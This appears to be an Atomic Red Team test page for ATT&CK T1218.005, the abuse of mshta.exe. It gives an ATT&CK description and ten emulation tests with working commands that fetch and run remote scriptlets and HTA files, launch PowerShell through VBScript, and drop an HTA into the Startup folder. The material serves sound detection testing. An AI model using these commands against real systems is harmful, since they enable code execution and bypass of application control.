T1218.005
Signed Binary Proxy Execution: Mshta
Description from ATT&CK
Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017)
Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)
Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta
Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)
Atomic Tests
Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched.
Supported Platforms: windows
auto_generated_guid: 1483fab9-4f52-4217-a9ce-daa9d7747cae
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| file_url | location of the payload | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct |
Attack Commands: Run with command_prompt!
1
2
mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
Atomic Test #2 - Mshta executes VBScript to execute malicious command
Run a local VB script to run local user enumeration powershell command. This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems. Upon execution, a new PowerShell windows will be opened that displays user information.
Supported Platforms: windows
auto_generated_guid: 906865c3-e05f-4acc-85c4-fbc185455095
Inputs:
None
Attack Commands: Run with command_prompt!
1
2
mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file PathToAtomicsFolder\T1218.005\src\powershell.ps1"":close")
Atomic Test #3 - Mshta Executes Remote HTML Application (HTA)
Execute an arbitrary remote HTA. Upon execution calc.exe will be launched.
Supported Platforms: windows
auto_generated_guid: c4b97eeb-5249-4455-a607-59f95485cb45
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| temp_file | temp_file location for hta | string | $env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\T1218.005.hta |
| hta_url | URL to HTA file for execution | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/T1218.005.hta |
Attack Commands: Run with powershell!
1
2
3
4
5
6
$var =Invoke-WebRequest "#{hta_url}"
$var.content|out-file "#{temp_file}"
mshta "#{temp_file}"
start-sleep -s 15
stop-process -name "calculator" -Force
Cleanup Commands:
1
2
remove-item "#{temp_file}" -ErrorAction Ignore
Atomic Test #4 - Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement
Executes an HTA Application using JScript script engine using local UNC path simulating lateral movement.
Supported Platforms: windows
auto_generated_guid: 007e5672-2088-4853-a562-7490ddc19447
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| script_engine | Script Engine to use | string | JScript |
| hta_file_path | HTA file name and or path to be used | string | Test.hta |
| mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe |
Attack Commands: Run with powershell!
1
Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath #{mshta_file_path}
Dependencies: Run with powershell!
Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. Check Prereq Commands:
1
2
3
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
Get Prereq Commands:
1
2
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
Atomic Test #5 - Invoke HTML Application - Jscript Engine Simulating Double Click
Executes an HTA Application using JScript script engine simulating double click.
Supported Platforms: windows
auto_generated_guid: 58a193ec-131b-404e-b1ca-b35cf0b18c33
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| script_engine | Script Engine to use | string | JScript |
| hta_file_path | HTA file name and or path to be used | string | Test.hta |
Attack Commands: Run with powershell!
1
Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -SimulateUserDoubleClick
Dependencies: Run with powershell!
Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. Check Prereq Commands:
1
2
3
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
Get Prereq Commands:
1
2
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
Atomic Test #6 - Invoke HTML Application - Direct download from URI
Executes an HTA Application by directly downloading from remote URI.
Supported Platforms: windows
auto_generated_guid: 39ceed55-f653-48ac-bd19-aceceaf525db
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe |
| hta_uri | URI to HTA | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta |
Attack Commands: Run with powershell!
1
Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path}
Dependencies: Run with powershell!
Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. Check Prereq Commands:
1
2
3
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
Get Prereq Commands:
1
2
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
Atomic Test #7 - Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler
Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler.
Supported Platforms: windows
auto_generated_guid: e7e3a525-7612-4d68-a5d3-c4649181b8af
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| rundll32_file_path | Location of rundll32.exe | path | $env:windir\system32\rundll32.exe |
| script_engine | Script Engine to use | string | JScript |
| protocol_handler | Protocol Handler to use | string | About |
Attack Commands: Run with powershell!
1
Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -UseRundll32 -Rundll32FilePath #{rundll32_file_path}
Dependencies: Run with powershell!
Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. Check Prereq Commands:
1
2
3
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
Get Prereq Commands:
1
2
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
Atomic Test #8 - Invoke HTML Application - JScript Engine with Inline Protocol Handler
Executes an HTA Application with JScript Engine and Inline Protocol Handler.
Supported Platforms: windows
auto_generated_guid: d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| mshta_file_path | Location of mshta.exe | path | $env:windir\system32\mshta.exe |
| script_engine | Script Engine to use | string | JScript |
| protocol_handler | Protocol Handler to use | string | About |
Attack Commands: Run with powershell!
1
Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -MSHTAFilePath #{mshta_file_path}
Dependencies: Run with powershell!
Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. Check Prereq Commands:
1
2
3
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
Get Prereq Commands:
1
2
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
Atomic Test #9 - Invoke HTML Application - Simulate Lateral Movement over UNC Path
Executes an HTA Application with Simulate lateral movement over UNC Path.
Supported Platforms: windows
auto_generated_guid: b8a8bdb2-7eae-490d-8251-d5e0295b2362
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe |
Attack Commands: Run with powershell!
1
Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_file_path}
Dependencies: Run with powershell!
Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. Check Prereq Commands:
1
2
3
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
Get Prereq Commands:
1
2
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
Atomic Test #10 - Mshta used to Execute PowerShell
Use Mshta to execute arbitrary PowerShell. Example is from the 2021 Threat Detection Report by Red Canary.
Supported Platforms: windows
auto_generated_guid: 8707a805-2b76-4f32-b1c0-14e558205772
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| message | Encoded message to include | string | Hello,%20MSHTA! |
| seconds_to_sleep | How many seconds to sleep/wait | integer | 5 |
Attack Commands: Run with command_prompt!
1
2
mshta.exe "about:<hta:application><script language="VBScript">Close(Execute("CreateObject(""Wscript.Shell"").Run%20""powershell.exe%20-nop%20-Command%20Write-Host%20#{message};Start-Sleep%20-Seconds%20#{seconds_to_sleep}"""))</script>'"